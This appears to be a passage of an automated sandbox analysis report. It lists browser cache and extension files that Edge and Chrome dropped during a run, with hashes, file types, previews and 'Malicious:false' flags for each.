                                                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_474771411\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_474771411\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_474771411\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_474771411\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_474771411\e5893cbc-238b-46ed-b6a1-cf5c5e75cd77.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 558

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (871)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):876
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.185060917144897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:NFOt6P8dBHslgT9lCuABATW7FuoB7HHHHHHHYqmffffffo:Q3dKlgZ01BAaRuSEqmffffffo
                                                                                                                                                                                                                                                                                                MD5:D7E6062A55DB61EC1AEB3A51ADFC7D7E
                                                                                                                                                                                                                                                                                                SHA1:E1AF38B258A528D14A684485F193DCBF2A2DC318
                                                                                                                                                                                                                                                                                                SHA-256:C112B7C363436BB71F851EAE285F285AA268638615A98AF4910319EEFE06635C
                                                                                                                                                                                                                                                                                                SHA-512:6C6606A251FAEB65C086C106B9A9EC80390D8310EBC846753A4D633619EDF123D6924C90F4EBEC9FF8D4F24B9D34AE7E084E46BD3FFABFA9978026220B61200A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                Preview:)]}'.["",["social security december ssi payment","sza lana sos deluxe","infinity nikki friendship glow","women volleyball championship 2024","weather forecast snow storm minnesota","nasa astronauts stuck in space","jenna ortega unicorn movie","fed rate cut mortgage interest rates"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-5546954046579616032,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 559

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 560

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):132738
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.43681777113447
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:fxkJQ7O4N5dTm+syHEt4W3XdQ4Q6vuSr/nUW2i6o:fYQ7HTt/sHdQ4Q6vDfUW8o
                                                                                                                                                                                                                                                                                                MD5:32D556DA070DB40C3B5D51E712AF0C55
                                                                                                                                                                                                                                                                                                SHA1:3237448C6F4F379F0E2B3AC58C1DEFDCCF39678E
                                                                                                                                                                                                                                                                                                SHA-256:CDE969937433B966B5C8AD7B77D42C2CC4608D8EB29E861237A4C9E9197A043C
                                                                                                                                                                                                                                                                                                SHA-512:062ADB4548E8DA71E2C77869BDF24233B9B906EB94BFFE66C9915BA74A7953ED713C8DA980DA6C0500C3EB4CC7EE9E10F729CF62087030BF4469E4951F0BA810
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 561

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):175897
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                                                MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                                                SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                                                SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                                                SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                                                Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 562

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):5162
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                Malicious:false
